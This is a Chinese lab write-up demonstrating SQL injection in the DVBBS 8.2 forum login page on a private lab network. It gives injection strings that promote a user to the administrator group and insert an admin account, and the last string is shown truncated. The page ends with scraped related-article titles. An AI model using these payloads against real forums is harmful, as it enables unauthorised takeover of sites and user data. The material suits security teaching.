一、实验目的

理解动网论坛8.2原理

二、实验原理

动网论坛用户登录过程中,过滤不严,导致注入,提升权限。漏洞存在源文件的login.asp中。

三、实验环境

本机:192.168.1.2
目标机:192.168.1.3

四、 实验步骤

一、正常注册登录
1、访问地址:http://192.168.1.3:8010/,如图示:

2、首先注册一个用户:san 密码:123456,如图:

二、漏洞测试与利用
1、退出san ,打开登录界面:

2、使用以下语句登录:san’ and ‘a’=’ a 密码:123456

3、使用以下语句再次登录:san’ and ‘a’=’ b 密码:123456

4、提示用户不存在,说明以上语句起作用了,用户名处输入:

,;update dv_user set usergroupid=1 where username='san'--


5、提示用户名不存在,我们再次使用正确用户名和密码san 123456登录。在控制面板-我能做什么中,点击后,显示已是管理员组用户。

6、san用户为管理员身份,退出,我们再次使用以下语句登录,密码为正确密码(此处步骤重要):

san’;insert into dv_admin

7、打开管理员界面http://192.168.1.3:8010/admin

使用用户名:admin 密码:123456成功登陆

8、登陆后发现已是管理员身份,如图:

动网论坛8.2经典注入漏洞利用相关推荐

  1. 不为人知的动网7.1 SQL版注入漏洞

    文章难易度:★★★ 文章阅读点:动网7.1 SQL版最新注入漏洞的详细利用以及如何在后台获取Webshell 话说上期X档案刊登了动网8.0 SQL版最新注入漏洞的文章,不知大家都掌握了没有,令人兴奋 ...

  2. 动网8.2版本的注入漏洞的利用

    [实验原理] 动网8.2在用户登录时,过滤不严,可以导致注入,提升权限.漏洞存在源程序的login.asp文件. [实验步骤] 一.正常注册登录 1.1访问地址:http://192.168.1.3: ...

  3. 动网 php v1.0 漏洞,动网论坛dispuser.php页面SQL注入漏洞

    受影响系统: 动网论坛 Dvbbs php 2.0++ 描述: DVBBS是一款Aspsky.Net开发和维护的开放源码ASP Web论坛程序. 在DVBBS的dispuser.php文件中: if( ...

  4. 利用动网论坛dvBBS漏洞上传webshell

    动网论坛一直是国内比较受欢迎的ASP论坛程序 前提是知道数据库地址,并且可下载,一般数据库默认地址为/data/dvbbs8.mdb 1.通过注入点获得网站的后台账号和密码,但没有找到后台登录地址 2 ...

  5. 安全至上---ASP“动网论坛”漏洞分析

    动网论坛作为国内一个优秀的asp论坛,深受广大站长和网友们的喜爱,但既然是程 序代码,就不可能是十全十美,今天在这里,我就要说一下它近期比较流行的两个漏洞 (好耶!快说快说,说完了我就去找常删我帖的论 ...

  6. 动网php_动网论坛PHP增强版(动网论坛PHP2.0++官方下载)V2.0官方版下载 - 下载吧...

    开拓的力量,前进的方向,经历了一个冬的孕育,动网PHP2.0++正式版在我们团队的精心培养下,顺利与大家见面了.动网论坛PHP增强版此次正式版,一如既往的延续了PHP2.0++的创新功能,在新功能的基 ...

  7. 动网论坛缓存技术研究

    动网论坛算是国内比较著名的一款论坛.从DVBBS7.0版本开始,动网重构了代码核心,采用缓存机制,程序和模板完全分离,在代码质量,权限等级,用户体验方面算是一个里程碑的作品了.虽然从7.0到现在的8. ...

  8. 动网论坛7.0获得WebShell的分析

    本文作者:angel 文章性质:原创 发布日期:2004-06-27  发现:Super·Hei  分析:angel  环境/讨论:xiaolu  起哄:knife 前言 Super·Hei和我提起& ...

  9. html缩小网页时版块乱跑,解决动网论坛最后发表显示代码的问题(或导致首页排版错乱)...

    动网论坛作为一个优秀的ASP论坛程序,两年前曾是千千万万站长的选择.虽然动网论坛官方停止了更新,但是由于我一个站用的是动网论坛,转换的话闲麻烦,而且之前做了不少个性化修改,再者我用着感觉也挺快的,也能 ...

最新文章

  1. python代码实例sicket_Python socket聊天脚本代码实例
  2. ndarray对象的建立
  3. RF工具ride使用
  4. Eclipse反编译插件(免费无需下载资源)
  5. Lattice Diamond在线调试Reveal Analyzer使用教程
  6. 阿铭Linux_网站维护学习笔记20190415
  7. word排版的时候如何将论文表格逆时针旋转90度竖放
  8. C# 从零开始编写一个修改“植物大战僵尸”阳光的内存辅助
  9. html图形渐变颜色一半一半,CSS3第八课:重复线性渐变repeating-linear-gradient
  10. CVPR 2022 Self-augmented Unpaired Image Dehazing via Density and Depth Decomposition个人学习笔记
  11. BP神经网络的MATLAB源码
  12. 小程序直接跳转公众号的必要条件记录
  13. Sun JVM,JRocket,J9,Harmony, 四种主要的Java虚拟机实现
  14. Linux中的rm指令
  15. TCP套接口的sk_backlog接收队列
  16. to_date的用法
  17. matlab亥姆霍兹线圈叠加原理,亥姆霍兹线圈仿真剖析.docx
  18. Spring全家桶-Spring Security之自定义数据库表认证和鉴权
  19. mipsel上移植花生壳域名服务
  20. java 响铃_怎么样编写一个java响铃程序?

热门文章

  1. 基于C++的Huffman赫夫曼编译码器开发 课程论文+项目源码及可执行exe文件
  2. Java实现QQ窗口自动输入
  3. 基于珠宝行业的RFID资产管理解决方案-新导智能
  4. @staticmethod静态方法
  5. DICOM:fo-dicom、dcm4che14、dcm4chee等开源库持续自我维护
  6. Windows10安装Docker详细步骤
  7. bbox regresion
  8. jsp servlet mysql项目_JSP+Servlet+JDBC+mysql实现的个人日记本系统
  9. 北京ADSL修改密码的网址
  10. 支付宝、微信注册时间,轻松查看!